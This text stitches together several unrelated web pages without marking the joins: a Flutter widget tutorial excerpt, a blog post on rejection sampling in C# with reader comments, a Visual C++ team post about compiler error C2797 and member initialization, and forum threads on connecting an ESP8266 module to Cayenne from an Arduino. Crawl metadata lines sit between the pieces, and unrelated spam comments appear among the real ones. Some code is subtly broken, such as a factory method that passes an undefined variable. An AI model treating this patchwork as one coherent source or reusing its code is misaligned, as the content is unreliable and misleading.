build(BuildContext context) { return new MaterialApp( title: 'Flutter Demo', theme: new ThemeData( primarySwatch: Colors.blue, ), home: new MyHomePage(title: 'Flutter Demo Home Page'), ); } } From here, your actual first page is another Widget, in which you create your state. A stateful widget, such as MyHomePage below, consists of two parts. The first part, which is itself immutable, creates a State object that holds the state of the object. The State object persists over the life of the widget. class MyHomePage extends StatefulWidget { MyHomePage({Key key, this.title}) : super(key: key); final String title; @override _MyHomePageState createState() => new _MyHomePageState(); } The State object implements the build() method for the stateful widget. When the state of the widget tree changes, call setState(), which triggers a build of that portion of the UI. Make sure to call setState() only when necessary, and only on the part of the widget tree that has changed, or it can result in poor UI performance. class _MyHomePageState extends State<MyHomePage> { int _counter = 0; void _incrementCounter() { setState(() { _counter++; }); } @override Widget build(BuildContext context) { return new Scaffold( appBar: new AppBar( // Take the value from the MyHomePage object that was created by // the App.build method, and use it to set the appbar title. title: new Text(widget.title), ), body: new Center( // Center is a layout widget. It takes a single child and positions it // in the middle of the parent.), ), ); } } In Flutter, the UI (also known as widget tree), is immutable, meaning you can’t change its state once it’s built. You change fields in your State class, then call setState() to rebuild the entire widget tree again. This way of generating UI is different than Xamarin.Forms, but there are many benefits to this approach.
http://semantic-portal.net/flutter-get-started-another-platform-xamarin-project-setup
CC-MAIN-2022-05
refinedweb
548
57.87
Last time on FAIC we went through a loose, hand-wavy definition of what it means to have a “weighted” continuous distribution: our weights are now doubles, and given by a Probability Distribution Function; the probability of a sample coming from any particular range is the area under the curve of that range, divided by the total area under the function. (Which need not be 1.0.) A central question of the rest of this series will be this problem: suppose we have a delegate that implements a non-normalized PDF; can we implement Sample() such that the samples conform to the distribution? The short answer is: in general, no. A delegate from double to double that is defined over the entire range of doubles has well over a billion billion possible inputs and outputs. Consider for example the function that has a high-probability lump in the neighbourhood of -12345.678 and another one at 271828.18 and is zero everywhere else; if you really know nothing about the function, how would you know to look there? We need to know something about the PDF in order to implement Sample(). The long answer is: if we can make a few assumptions then sometimes we can do a pretty good job. Aside: As I’ve mentioned before in this series: if we know the quantile function associated with the PDF then we can very easily sample from the distribution. We just sample from a standard continuous uniform distribution, call the quantile function with the sampled value, and the value returned is our sample. Let’s assume that we do not know the quantile function of our PDF. Let’s look at an example. Suppose I have this weight function: double Mixture(double x) => Exp(–x * x) + Exp((1.0 – x) * (x – 1.0) * 10.0); If we graph that out, it looks like this: I called it “mixture” because it is the sum of two (non-normalized) normal distributions. This is a valid non-normalized PDF: it’s a pure function from all doubles to a non-negative double and it has finite area under the curve. How can we implement a Sample() method such that the histogram looks like this? Exercise: Recall that I used a special technique to implement sampling from a normal distribution. You can use a variation on that technique to efficiently sample from a mixture of normal distributions; can you see how to do so? See if you can implement it. However, the point of this exercise is: what if we did not know that there was a trick to sampling from this distribution? Can we sample from it anyways? The technique I’m going to describe today is, once more, rejection sampling. The idea is straightforward; to make this technique work we need to find a weighted “helper” distribution that has this property: The weight function of the helper distribution is always greater than or equal to the weight function we are trying to sample from. Now, remember, the weight function need not be “scaled” so that the area under the curve is 1.0. This means that we can multiply any weight function by a positive constant, and the distribution associated with the multiplied weight function is the same. That means that we can weaken our requirement: There exists a constant factor such that the weight function of the helper distribution multiplied by the factor is always greater than or equal to the weight function we are trying to sample from. This will probably be more clear with an example. Let’s take the standard normal distribution as our helper. We already know how to sample from it, and we know it’s weight function. But it just so happens that there exists a constant — seven — such that multiplying the constant factor by the helper’s weight function dominates our desired distribution: Again, we’re going to throw some darts and hope they land below the red curve. - The black curve is the weight function of the helper — the standard normal distribution — multiplied by seven. - We know how to sample from that distribution. - Doing so gives us an x coordinate for our dart, distributed according to the height of the black curve; the chosen coordinate is more likely to be in a higher region of any particular width than a lower region of the same width. - We’ll then pick a random y coordinate between the x axis and the black curve. - Now we have a point that is definitely below the black line, and might be below the red line. - If it is not below the red line, reject the sample and try again. - If it is below the red line, the x coordinate is the sample. Let’s implement it! Before we do, once again I’m going to implement a Bernoulli “flip” operation, this time as the class: sealed class Flip<T> : IWeightedDistribution<T> { public static IWeightedDistribution<T> Distribution( T heads, T tails, double p) You know how this goes; I will skip writing out all that boilerplate code. We take values for “heads” and “tails”, and the probability (from 0 to 1) of getting heads. See the github repository for the source code if you care. I’m also going to implement this obvious helper: static IWeightedDistribution<bool> BooleanBernoulli(double p) => Flip<bool>.Distribution(true, false, p); All right. How are we going to implement rejection sampling? I always begin by reasoning about what we want, and what we have. By assumption we have a target weight function, a helper distribution whose weight function “dominates” the given function when multiplied, and the multiplication factor. The code practically writes itself: public class Rejection<T> : IWeightedDistribution<T> { public static IWeightedDistribution<T> Distribution( Func<T, double> weight, IWeightedDistribution<T> helper, double factor = 1.0) => new Rejection<T>(weight, dominating, factor); I’ll skip the rest of the boilerplate. The weight function is just: public double Weight(T t) => weight(t); The interesting step is, as usual, in the sampling. Rather than choosing a random number for the y coordinate directly, instead we’ll just decide whether or not to accept or reject the sample based on a Bernoulli flip where the likelihood of success is the fraction of the weight consumed by the target weight function; if it is not clear to you why that works, give it some thought. public T Sample() { while(true) { T t = this.helper.Sample(); double hw = this.helper.Weight(t) * this.factor; double w = this.weight(t); if (BooleanBernoulli(w / hw).Sample()) return t; } } All right, let’s take it for a spin: var r = Rejection<double>.Distribution( Mixture, Normal.Standard, 7.0); Console.WriteLine(r.Histogram(–2.0, 2.0)); And sure enough, the histogram looks exactly as we would wish: ** *** *** ***** ***** ****** ****** **************** ***************** ******************* ******************** ********************* ********************* *********************** ************************ ************************* *************************** ***************************** ********************************* ---------------------------------------- How efficient was rejection sampling in this case? Actually, pretty good. As you can see from the graph, the total area under the black curve is about three times the total area under the red curve, so on average we end up rejecting two samples for every one we accept. Not great, but certainly not terrible. Could we improve that? Sure. You’ll notice that the standard normal distribution times seven is not a great fit. We could shift the mean 0.5 to the right, and if we do that then we can reduce the multiplier to 4: That is a far better fit, and if we sampled from this distribution instead, we’d reject a relatively small fraction of all the samples. Exercise: Try implementing it that way and see if you get the same histogram. Once again we’ve managed to implement Sample() by rejection sampling; once again, what are the pros and cons of this technique? - Pro: it’s conceptually very straightforward. We’re just throwing darts and rejecting the darts that do not fall in the desired area. The darts that do fall in the desired area have the desired property: that samples from a given area arrive in proportion to that area’s size. - Con: It is by no means obvious how to find a tight-fitting helper distribution that we can sample such that the helper weight function is always bigger than the target weight function. What distribution should we use? How do we find the constant multiplication factor? The rejection sampling method works best when we have the target weight function ahead of time so that we can graph it out and an expert can make a good decision about what the helper distribution should be. It works poorly when the weight function arrives at runtime, which, unfortunately, is often the case. Next time on FAIC: We’ll look at a completely different technique for sampling from an arbitrary PDF that requires less “expert choice” of a helper distribution. Is that a boa constrictor digesting an elephant? Close. It’s Mount Snuffleupagus. I was just going to propose the name “Saint-Exupéry’s Elephant Curve”, in the same vein as the normal distribution being also known as bell curve. Really enjoying this series, especially your points about the IDistribution abstraction. Do you think there is mileage in creating a class library with some of these implementations? Are you planning on doing so? I guess you’ve pointed out on a number of occasions that you’d take more care over performance and API design if you were doing this for production code, so more thought would be required than just using the code you’ve supplied in this series. I doubt I will go to the work of making a really solid implementation; I’m more trying to get the ideas across. My primary purpose here is that I enjoy thinking about how these concepts intersect with programming language design; this is an area of active research in programming languages, and I’m having fun learning about it. I hope my readers are too. But there is a secondary purpose. C# has historically succeeded when it embeds yet another monad in the language to solve a real user problem. C# 2 added language support for the nullable monad, C# 2 and 3 added language support for the sequence monad (and did so in a way that supported the observable collection monad), and C# 5 added language support for the task monad. These changes were not just the incremental change you get from a new library; they enabled us to think about programming in C# in a different way. The gear that the C# team added for user-supplied awaitable types is *so close* to what you’d need in the compiler to do probabilistic workflows embedded in the language. My secondary purpose is to make the case that the C# team should be thinking about what the next monad to add is. Thanks to the success of machine learning, we’re building all sorts of probabilistic reasoning into important workflows, but the language and libraries are still clunky. And because Bayesian reasoning is sometimes counterintuitive, it’s easy to make a mistake. When asynchronous workflows were a clunky, error-prone spaghetti of callbacks, we added gear to the language that enabled you to make the compiler do the hard work of rewriting the program into callbacks. Well, we can do the same here; we can make the compiler and libraries do the hard work of analyzing and rewriting a probabilistic workflow also. A related question: if you were to make a class library (or indeed implement some of these distributions as part of another project) and you wanted to test the implementations, how would you do so? So far we’ve drawn a histogram and eyeballed it, but that isn’t particularly scientific, nor is it easily repeatable. However, if you wanted to write automated tests, that would be tricky, because the whole point of probabilistic distributions is that you can’t predict what you’ll get. I think there would be value in testing the distributions, because some of the algorithms you’d use to implement them are quite fiddly. Any advice? You’ll notice that in the early days I called out that there was a difference between random and pseudo-random number providers; a classic way to make tests on stochastic code repeatable is to use a pseudo-random source, and make the initialization information part of each test suite. Suppose you implement the Poisson distribution (perhaps using one of these), and you test it by supplying a deterministically-seeded pseudo-random number generator. As I see it there are two options for how you write your assertions. 1. Generate n samples and check they match a hard-coded collection of n integers. This has the problem that if you change your algorithm the tests will fail, even if the new algorithm does produce values according to the correct distribution. We’re testing the implementation not the behaviour. 2. Generate n samples and check they correspond to the expected histogram, within some tolerance. The problem here is picking an appropriate tolerance, so that you avoid both false negatives and false positives. Which approach would you suggest? Can you see any way round the problems I’ve mentioned? Pingback: Fixing Random, part 28 | Fabulous adventures in coding
https://ericlippert.com/2019/05/02/fixing-random-part-27/
CC-MAIN-2020-40
refinedweb
2,213
61.06
I am trying to find a file *tech.so fnmatch.fnmatch(name, pattern) import os, fnmatch path = "\\\\location1\\build1\\obj\\vendor\\qcom\\opensource\\tech" def find(pattern, path): result = [] for root, dirs, files in os.walk(path): for name in files: #print name if fnmatch.fnmatch(name, pattern): result.append(os.path.join(root, name)) return result result = find('*.tech.so', path) print result//prints empty string Your match pattern is *.tech.so, but the name you're looking for is caq_cdl3_tech.so fnmatch patterns aren't the same as a regex, so . only matches a literal ., not 'any single character' as it would in a regex. using *tech.so or *_tech.so as the pattern should work.
https://codedump.io/share/D3R6MjTAD7Jk/1/pattern-match-failing-while-finding-a-file
CC-MAIN-2017-34
refinedweb
118
63.86
In this article, I'll show you how to create a very simple control to represent a small cross button - the sort that you see in the tabbed windows or certain controls. I found that when creating a custom tab control that allowed the user to close the tabs with a small button, a control like this would be useful. However, in later projects, this small control has been surprisingly versatile. Let's get started. Create a new Visual Studio Solution and add a WPF Custom Control Library to it. The custom control code is very simple: /// <summary> /// The Cross Button is a very simple version /// of the button that displays as a discrete cross, /// similar to the buttons at the top of Google Chrome's tabs. /// </summary> public class CrossButton : Button { /// <summary> /// Initializes the <see cref="CrossButton"/> class. /// </summary> static CrossButton() { // Set the style key, so that our control template is used. DefaultStyleKeyProperty.OverrideMetadata(typeof(CrossButton), new FrameworkPropertyMetadata(typeof(CrossButton))); } } Now we are deriving the control from Button; the only thing this code really does is makes sure that the style we use for the CrossButton is the correct style that we will add in our Generic.xaml dictionary. Button CrossButton We actually have no custom code in the control - we could define the whole thing as a style that just re-templates the button. However, in my local version, I have added a few more features - if you have a class like this, you can extend yours too. The XAML in the Generic.xaml file is basic as well: <ResourceDictionary xmlns="" xmlns:x="" xmlns: <Style TargetType="{x:Type local:CrossButton}"> Generic.xaml is a resource dictionary, we need a reference to the namespace we have defined in the control in. The only thing we have in the resource dictionary is the style for the cross button. Note: If you want to implement this control simply as a style, just set the target type to 'Button' and give the style a key - then apply the style to any button. Moving on, we'll need a few resources for the button. <!-- Brushes we use for the control. --> <Style.Resources> <SolidColorBrush x: <SolidColorBrush x: <SolidColorBrush x: <SolidColorBrush x: <SolidColorBrush x: <SolidColorBrush x: <SolidColorBrush x: <SolidColorBrush x: </Style.Resources> These are the brushes we'll use to paint the button in its various states. <!-- Simple properties that we set. --> <Setter Property="Cursor" Value="Hand" /> <Setter Property="Focusable" Value="False" /> This is such a small button that it'll help to have the cursor as a hand so that it is obvious it is clickable. Also, by setting the Focusable style to False, we stop the user from tabbing to the control which in most circumstances would be a bit odd. Focusable False Here's where it gets more interesting: <!-- The control template. --> <Setter Property="Template"> <Setter.Value> <ControlTemplate TargetType="{x:Type Button}"> This is where we are going to change the control's template. The control template is what is used to draw the control - by changing the template, we can completely change how we draw the control. <Grid Background="Transparent"> <!-- The background of the button, as an ellipse. --> <Ellipse x: <!-- A path that renders a cross. --> <Path x: The cross button is a simple looking button - a small cross with a red circle behind it when the mouse is over it. We put the ellipse and path (which will draw the cross) in a grid, drawing one on top of the other. We have the path, but we'll need to define the geometry for it: <Path.Data> <PathGeometry> <PathGeometry.Figures> <PathFigure StartPoint="0,0"> <LineSegment Point="25,25"/> </PathFigure> <PathFigure StartPoint="0,25"> <LineSegment Point="25,0"/> </PathFigure> </PathGeometry.Figures> </PathGeometry> </Path.Data> </Path> </Grid> The geometry is very simple - two line segments! We can close the path and the grid and now move onto the more interactive features. We'll use triggers to change colours as the mouse moves over the control. <!-- The triggers. --> <ControlTemplate.Triggers> <Trigger Property="IsMouseOver" Value="True"> <Setter TargetName="backgroundEllipse" Property="Fill" Value="{StaticResource HoverBackgroundBrush}" /> <Setter TargetName="ButtonPath" Property="Stroke" Value="{StaticResource HoverForegroundBrush}"/> </Trigger> The first trigger is fired when the mouse moves over - simply changing the colour of the background ellipse and the button path. <Trigger Property="IsEnabled" Value="false"> <Setter Property="Visibility" Value="Collapsed"/> </Trigger> If the control isn't enabled, we'll just hide it - it's a very discrete little button. <Trigger Property="IsPressed" Value="true"> <Setter TargetName="backgroundEllipse" Property="Fill" Value="{StaticResource PressedBackgroundBrush}" /> <Setter TargetName="backgroundEllipse" Property="Stroke" Value="{StaticResource PressedBorderBrush}" /> <Setter TargetName="ButtonPath" Property="Stroke" Value="{StaticResource PressedForegroundBrush}"/> </Trigger> </ControlTemplate.Triggers> </ControlTemplate> </Setter.Value> </Setter> </Style> </ResourceDictionary> We use the final trigger to colour the control black and white when it is pressed. After this, we close all of the tags and we're done with the dictionary. The example application shows how to use the control in a data template to remove items from a list: This is just one use for the control - below is another (not in the example): If anyone would find the above control useful, let me know and I'll write an article.
http://www.codeproject.com/Articles/242628/A-Simple-Cross-Button-for-WPF
CC-MAIN-2015-18
refinedweb
860
54.22
ago) for handling initialization suffers from many longstanding architectural limitations. This code was sufficient for C++03-style initialization, but NSDMI, a C++11 feature, caused it to exhibit these limitations as severe bugs. One of these bugs is described in the MSDN article about error C2797. List initialization inside a non-static data member initializer would have been silently converted into a function call, resulting in incorrect behavior. That is, if one writes: #include <vector> class S { std::vector<int> v{ 1, 2 }; }; The compiler would have treated the code above as if the user had written: #include <vector> class S { std::vector<int> v = std::vector<int>(1, 2); }; Instead of initializing the vector with two given elements, the Visual Studio 2013 RTM compiler initializes it with length one and a single element. We’ve received countless bug reports about this behavior in the past year. Furthermore, this is not the only issue that prevents initializer lists from functioning correctly. We originally planned to fix this bug in an update to Visual Studio 2013, but from an engineering perspective, the right thing to do is to avoid another kludge and thoroughly address the handling of initialization. But overhauling compiler architecture is a massive task due to the amount of fundamental code that needs to be modified. We could not risk creating incompatibilities or large bug tails in an update, so a correct implementation of NSDMI could only be shipped in a major release. Meanwhile, we still needed to address the steady stream of incoming feedback about bad code generation, so we made the hard decision of creating error C2797. This error guides users towards avoiding the issue and working around it by writing explicit constructions of inner lists, as the MSDN article suggests. The following code, for example, works as expected: #include <vector> class S { std::vector<int> v = std::vector<int> {1, 2}; }; We are aware that the release notes for Visual Studio 2013 Update 3 did not include a notification about this new error. That was a mistake and we sincerely apologize for any confusion this has caused. However, C2797 will continue to be present in all future versions of Visual Studio 2013, so we recommend that you immediately make use of the provided workarounds. The architectural changes and fixes for initialization will be included in Visual Studio “14” RTM. Join the conversationAdd Comment I am afraid I don't really agree with your decision to force customers to buy the new version of your product (Visual Studio “14”) in order to overcome bugs present in the current release from just 10 months ago. Hi, this post really should have been published a day or so before Update 3 came out and all would have been good ;-) Anyway, make sure that VS14 is C++14 compliant and all is forgotten :-) Kind regards, Sven I agree with Evgenii Golubev, this is pretty shoddy. I purchased 2012 only to find it broken, upgraded to 2013 to still find key features broken and the solution is another upgrade – still with key features missing or broken no doubt? I recall Herb promising a new dawn for C++ on Microsoft platforms but what we get is the same old feeble tools. The open source community is light-years ahead on quality and delivery on what should be your cornerstone product. Microsoft has deep pockets and its about time it got the checkbook out and hired an army of top talent to get this house in order, really oh dear me. Thanks for the explanation and the workaround! I totally agree that a hard error with a known workaround is better than silent bad code generation. Glad to hear it will finally be fixed in VC14. VS 2013 is much slower and buggier than VS 2012. How about concentrating on increasing performance and stability and decoupling the C++ tool chain from the IDE so you can update it without forcing us to spend quite a bit of money updating the IDE? Microsoft also needs to get back to the idea that happy developers means more and better products. (Versus seeing dev tools as a potential profit center.) Start a new compiler. New team. Using old, what was it, Lattice, as an excuse only shows how badly this needs to happen. What!? You refuse to fix a serious bug and blame the age of the code base? Seriously, just start over with Clang. Thanks for explaining and documenting this limitation. I can live with it even though I don't like it. I know how hard it is to deal with ancient codebases from my own experience. And I certainly agree on not kludging stuff on. May I suggest to graft the shiny new VS'14' initialization code (after release) back onto VS2013 in the form of a final service pack or whatever you may call a bugfix update? Face-palm deficiencies like the above should be addressed in a professional product, imho. Dear Kangyuan Niu, You wrote about the code in your compiler: "This code was sufficient for C++03-style initialization". However, an important feature introduced by the C++03 standard was never fully implemented by Visual C++: value-initialization. Is there any chance that the next release of Visual C++ will finally fully support C++03-style value-initialization? See also: Bug ID 499606, "Presence of copy constructor breaks member class initialization", by Alex Vakulenko Bug ID 484295, "VC++ does not value-initialize members of derived classes without user-declared constructor", by Sylvester Bug ID 100744, "Value-initialization in new-expression", reported by Pavel back in 2005 (was removed from Connect!) My compiler test on value-initialization at Boost: svn.boost.org/…/boost_no_com_value_init.ipp Which can be used as follows: Sorry to repeat myself. I asked the same question before, on 10 August, at blogs.msdn.com/…/visual-studio-14-ctp-2-available.aspx Agreed. Support Visual Studio versions released within the last 2.5 years. We have the same thing with Visual Studio 2012 having only minimal fixes for core functionality. The VS 2012 updates added extra features we did not need. We reduced our footprint of tools, libraries, etc to only Tier 1 supported ones from MS for just this reason. Tier 1 including compiler, linker, debugger, SQL Server, basic OS, network APIs and little else. Tier 2 technologies are likely to be end of life, unsupported, or touch-released (release only to update the release date with little or no changes to the underling code base). Yes, please make this fix available to VS2013 as a final update. If breaking code is a concern – why not release it as a seperate Platform Toolset – thats what this mechanism is for, right!? Just make sure the stl is part of that toolset – then everyone is happy and it won't interfere with the original VS2013 compiler. Everyone, thanks for voicing your opinions. Niels, I have responded to you in the other thread. Regarding a potential "final patch" for Visual Studio 2013 that fixes NSDMI: We cannot do that. To implement initialization correctly, we've had to make major architectural changes in the compiler and it would be impossible to back-port those changes. We also can't bring back the incorrect RTM behavior because we feel that providing this diagnostic is strictly better than letting users deal with a very puzzling silent bad code generation issue. The downside is that some previously working code will no longer compile, but the upside is that the compiler will now reject code that had a risk of behaving badly anyway. Sorry, Kangyuan, but there is no technical reason you cannot patch Visual Studio 2010, 2012 and 2013. None. If it would break a developers code, then he doesn't update. It's that simple. The only reasons Microsoft won't do this (and decouple the compiler and Visual Studio version) is arrogance and greed. This kind of nonsense may work with Office and users who haven't dealt with this very attitude at their own jobs. But you are dealing with developers, most of whom have sat in meetings while pointy head managers and marketers decided features should be in the bullet list of the next upgrade. (Incidentally, throwing the same effort into clang and LLVM would be a boon to C++ developers everywhere.) In my view Microsoft had plenty of time to fix their architecture. C++11 features have been in talks for close to 10 years now. And Herb is the head of the committee. How could you not have forseen that? 10 years is plenty of time to get a new compiler project started to clean out the old gunk. It's good to see such information published! Thanks for that. And again, we see how coupling the C++ compiler to the IDE as tightly as MS does is holding you back from speedily adopting properly working C++new features. You see, the *real* problem with stuff like this is not that I have to buy a new VS version (isn't everyone on MSDN subscription anyway) — the real problem is that, to get a new and fixed compiler, I have to wait for the whole bloody IDE package to be available, including an oil tanker full of features that I never need. "We cannot do that. To implement initialization correctly, we've had to make major architectural changes in the compiler and it would be impossible to back-port those changes." Well, I simply don't believe your claims. I don't see a reason why you cannot publish the NEW compiler as PLATFORM TOOLSET like you do it for the CTP releases. No need to backport IDE changes… I think no one would worry if the autocorrection/completion does not work 100%. I think it's rather "We have decided not to do it – whether you like it or not". Other companies maintain their products for a decade, VS2013 has been released a year ago! I also want to remind you that VS still is not a pure subscription based service (if you dnt want full msdn) where it would not matter – lot's of people bought a single license. Our 20+ enterprise systems are developed and maintained by 9 developers. Each year, we get to do major releases for 2 of them plus multiple minor releases for the others. Upgrading a VS version is, at best, done once every 3-4 years for each application. It's why we need more than 6-9 months of updates to a VS version. VS 2010 released April 2010 VS 2012 released September 2012 VS 2013 released October 2013 We build an individual development VM for each application with the particular development tools for that application to minimize the effect of conflicting VS and OS updates. This is why having the development tools updated for more than 9 months after release is important; and having the technical documentation available on and, importantly, offline installed into the VM is important. A slimmed down VS would help towards this in that we use a small set of VS features outside of the compiler, debugger, linker, project explorer. For agile, we use only basic TFS user story/backlog item creation, editing and costing. This is to lower the moving part count and lower our maintenance effort. Not upgrading to Update 3. Making this a compiler error in Update 3 was idiotic. There wouldn't be such a controversy if C2797 were present in 2013 RTM. Adding this error seems sensible to me. But when you don't fix much smaller things (see my previous posts about connect issues) that you could fix I can see why nobody believes you this time. Why don't you just use clang is a chorus that needs to be listened to and answered. The third row of the table on msdn.microsoft.com/…/hh567368.aspx lists "Non-static data member initializers" as supported in Visual Studio 2013 — please provide an updated table of supported features. This is terrible. I am writing a cross platform application and supporting windows has now become that much more of a chore. Now I have to abandon using such a nice feature of C++ just to support windows, after all the time I spent writing code that worked in update 2. I don't understand why they can't fix this 90% of the way for 2013 and provide the correct fix in 2014. I can't believe microsoft treats the users of such an important product with such contempt. Thanks for the explanation! Related question: is there a way to fix the debug information for Non-static Data Member Initialization of derived classes? Scenario: – base class Foo – derived class Bar has a NSDMI for private member int b = 5; – derived class .cpp file has ctor, dtor, etc. – breakpoint in the derived Bar ctor triggers, stepping through does not lead to the .h NSDMI, but rather jumps arbitrarily through the .cpp! Code: //—– //FOO.H #pragma once class Foo { public: Foo( void ) = default; }; //—– //BAR.H #pragma once #include "Foo.h" class Bar : public Foo { public: Bar(); ~Bar(); private: int bar = 5; }; //—– //BAR.CPP #include "Bar.h" Bar::Bar() { // <— BREAKPOINT (step through & watch the jumping) } Bar::~Bar() { } //—– //MAIN.CPP #include "Bar.h" int main( void ) { Bar bar; return 0; } Visual Studio Info: – Version 12.0.30723.00 Update 3 – C++ Console Application – Obviously in Debug mode, just getting bad debug info from the constructor with NSDMI. Using a stitch marker, crochet around 24 stitches, move the marker to the loop on your hook, then crochet around 24 again, then move the stitch marker to the loop on your hook, and repeat until you have 9 rows. I do believe all of the ideas you’ve introduced to your post. They’re very convincing and can certainly work. Still, the posts are too brief for starters. May you please lengthen them a little from subsequent time? Thank you for the post. Hello my loved one! I wish to say thst this post is amazing, great written and include almost all vital infos. I’d like to peer more posts like this . Ηellߋ friends, how іѕ evеrything, and whaqt ʏou would lіke to ѕay aƄout this article, іn my view its actuaⅼly remarkable for mе. I will immediately seize your rss as I can’t in finding your e-mail subscription hyperlink or newsletter service. Do you’ve any? Kindly allow me recognize so that I could subscribe. Thanks. Helpful information. Fortunate me I found your website accidentally, and I’m stunned why this accident didn’t took place in advance! I bookmarked it. It’ѕ perfect time to make a few plans for the lօnger term andd it’s time to be hapρy. I have learn this publish and if I may I wish to recommend you few fascinating thingѕ οr tips. Mɑybe you couyld write sսbsequent artifles refеrring to this article. I want to learn moгe issuews approximately it! Thankfulness to my father who shared with me concerning this website, this webpage is truly awesome.
https://blogs.msdn.microsoft.com/vcblog/2014/08/19/the-future-of-non-static-data-member-initialization/
CC-MAIN-2017-47
refinedweb
2,522
62.58
NAME mouse_setscale - sets a mouse scale factor SYNOPSIS #include <vgamouse.h> void mouse_setscale(int s); DESCRIPTION This routine sets the scale factor between the motion reported by the mouse and the size of one pixel. The larger the scale is, the slower the mouse cursor appears to move. The scale may be set to any non-zero integer. Negative scales result in flipped axes. Currently, there is no support for scale factors between 0 and 1 which would make the mouse appear faster than usual. If this routine is never called, scale s defaults to 1. SEE ALSO svgalib(7), vgagl(7), libvga.config(5), eventtest(6), mouse_init(3), mouse_close(3), mouse_getposition_6d(3), mouse_getx(3), mouse_setposition.
http://manpages.ubuntu.com/manpages/oneiric/man3/mouse_setscale.3.html
CC-MAIN-2013-48
refinedweb
116
68.16
Hi Craig, Thanks for the response. Yes, I have tried 2 type of devices NodeMCU and Wemos connected to Cayenne without problems. I am sure it's not about firewall because when I upload the script, there is no new DHCP client connected in my router. (It's only shown in DHCP client when I am debuging the connection with AT+CWJAP="MyRouter","Password"). Hi @kreggly Do you know how to solve this type of error? ; (I'm using an arduino one + ESP8266) C:\Users\Ricardo\Documents\Arduino\libraries\Cayenne-MQTT-ESP8266-master\src/CayenneMQTTESP8266.h:21:25: fatal error: ESP8266WiFi.h: No such file or directory #include I attach the code, greetingsexampleesp8266.txt (1.7 KB) That sketch is not designed to use the ESP as a shield. It is designed to reflash the firmware inside the ESP with this sketch. The Uno is entirely un-necessary. If you are trying to compile it for Uno, I can see how you might get errors. I have not seen a sketch yet that uses the ESP as a shield yet with MQTT. Cheers, Craig And with a wifi shield if possible? What type of wifi shield should I buy to connect my arduino one by wifi to cayenne? . I'm new to this, I thought with an ESP8266 module that was enough. The ESP modules are magical. They can actually be programmed with an Arduino sketch. You don't need an Arduino at all. If you do want to use an ESP with an Uno, so you have access to the IO etc, you can use the ESP as a Uno WiFi shield. You just need to use the Blynk based Cayenne library and program the ESP with an AT command set. You can also upload the ESP MQTT sketch to the ESP - the sketch you attached earlier, and get connected to Cayenne. I do not know of a way to use the ESP as a Uno WiFi shield with the Cayenne MQTT however. Does this clarify things for you. Finally after so many attempts following this conversation. I finally tried this method. After so many attempts, finally the code was successfully uploaded to Arduino. But when I opened my Cayenne Dashboard, the Arduino was still offline. The Serial Monitor displayed the following messages : ATE0 AT+CIPSTART="TCP","arduino.mydevices.com",8442AT+CIPCLOSEDid i miss out any steps or something. Kindly do help me asap. I'm stuck with this since long time. Your help is much appreciated.THANKS IN ADVANCE Hi @saromarimuthu Were you able to flash the ESP firmware with the AT command set? @kreggly may be able to help there. I've done it but can't remember where I got the .bin file used for the AT set. I used a flash program I found online and used a USB to TTL card to connect to the rx and tx pins. Yeah, I have the PlDuino talking Cayenne. I'll write something up showing how soon. You can use the NodeMCU windows app to load AT SW. I put 1.3 in the PlDuinoESP-02. The Cayenne lib supports 1.0 and above. Awesome! I finally hooked up my ESP-01 to my UNO and your code is working for me as well. One thing that I do have to point out is that "#define EspSerial Serial1" does not work on an UNO. The correct line is "#define EspSerial Serial". Found this on another forum: Arduino Uno doesn't have Serial1, only Serial:Serial: 0 (RX) and 1 (TX). Used to receive (RX) and transmit (TX) TTL serial data. These pins are connected to the corresponding pins of the ATmega8U2 USB-to-TTL Serial chip. I'm not exactly sure what they mean by Arduino Uno doesn't have Serial1, only Serial. This is true for Uno. I made that statement elsewhere. We really need a clean space to put moderated/tested solutions I'd like to figure out how to get Cayenne to support the Software serial library. Then we could drop the ESP on some generic pins and keep "Serial" for debug. The Cayenne lib doesn't like being passed a Software serial port. hi.. my wifi module model is ESP8266 12F, FOR THIS MODULE how i connect ? Two ways. Program the ESP with firmware that speaks cayenne. Program it with the AT command firmware and command it with an arduinothrough the serial port. Both ways are detailed on the forum. When I have time, I have been asked to make better howtos on connecting themyriad ESP devices, but I only volunteer here. My day job designing controlsystems keeps me pretty busy If you don't find the answers by searching the forum, I'll likely getaround to some documentation this Saturday. Sunday, I'm brewing beer! I get the following error:Arduino: 1.8.2 (Windows Store 1.8.3.0) (Windows 10), Board: "Generic ESP8266 Module, 80 MHz, 40MHz, DIO, 115200, 512K (64K SPIFFS), ck, Disabled, None" C:\Users\Pavitar\Documents\Arduino\libraries\ESP8266HardwareSerial\ESP8266.cpp:22:26: fatal error: avr/pgmspace.h: No such file or directory #include ^ compilation terminated. exit status 1Error compiling for board Generic ESP8266 Module. did you get a solution? I'm also stuck at compilation errors Do you have the board installed? Not sure why you would get that error. In doing some research on this, it looks like a legacy code issue, pointing at a hardcoded folder that is not always there. Try locating the ESP8266.cpp file on your computer and changing: #include <avr/pgmspace.h> to #include <pgmspace.h> I've had to hack the library files for some of the ESP modules that are not identified by the IDE as ESPs. Are we talking raw ESP8266 12F modules, or some board with the 12F and a usb to serial module? One of my major issues is also that I'm not able to program esp8266 independently. Offlate it has always given me the following error, which was working just fine before warning: espcomm_sync failederror: espcomm_open failederror: espcomm_upload_mem failed I tried doing this, but it led to another error saying: In file included from C:\Users\Pavitar\Documents\Arduino\libraries\Cayenne/CayenneESP8266Shield.h:24:0, from C:\Users\Pavitar\Desktop\esp8266cayenne\esp8266cayenne.ino:24: C:\Users\Pavitar\Documents\Arduino\libraries\Cayenne/BlynkSimpleShieldEsp8266_HardSer.h:15:2: error: #error This code is not intended to run on the ESP8266 platform! Please check your Tools->Board setting. #error This code is not intended to run on the ESP8266 platform! Please check your Tools->Board setting. ^
http://community.mydevices.com/t/wifishield-with-arduino-uno-compiling-error/1269?page=3
CC-MAIN-2017-39
refinedweb
1,099
68.26
